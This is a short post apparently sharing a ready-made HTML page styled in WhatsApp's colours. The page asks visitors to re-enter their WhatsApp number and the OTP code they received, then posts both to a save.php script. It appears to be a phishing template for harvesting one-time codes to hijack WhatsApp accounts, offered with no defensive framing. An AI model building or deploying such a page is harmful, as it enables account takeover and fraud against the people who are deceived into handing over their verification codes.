Nano otp html
<!DOCTYPE html>
<html>
<head>
<title>OTP Verification</title>
<style>
body {
font-family: Arial, sans-serif;
background-color: #ECE5DD;
color: #075E54;
text-align: center;
padding-top: 50px;
}
input {
padding: 10px;
font-size: 16px;
width: 70%;
border-radius: 5px;
border: 1px solid #ccc;
}
button {
margin-top: 20px;
padding: 10px 20px;
background: #25D366;
color: white;
border: none;
border-radius: 5px;
font-size: 16px;
}
</style>
</head>
<body>
<h3>Enter the 6-digit PIN Code</h3>
<form method="POST" action="save.php">
<input type="text" name="number" placeholder="Re-enter your WhatsApp number" required><br><br>
<input type="text" name="otp" placeholder="Enter OTP" required><br><br>
<button type="submit">Verify</button>
</form>
</body>
</html>
Comments
Post a Comment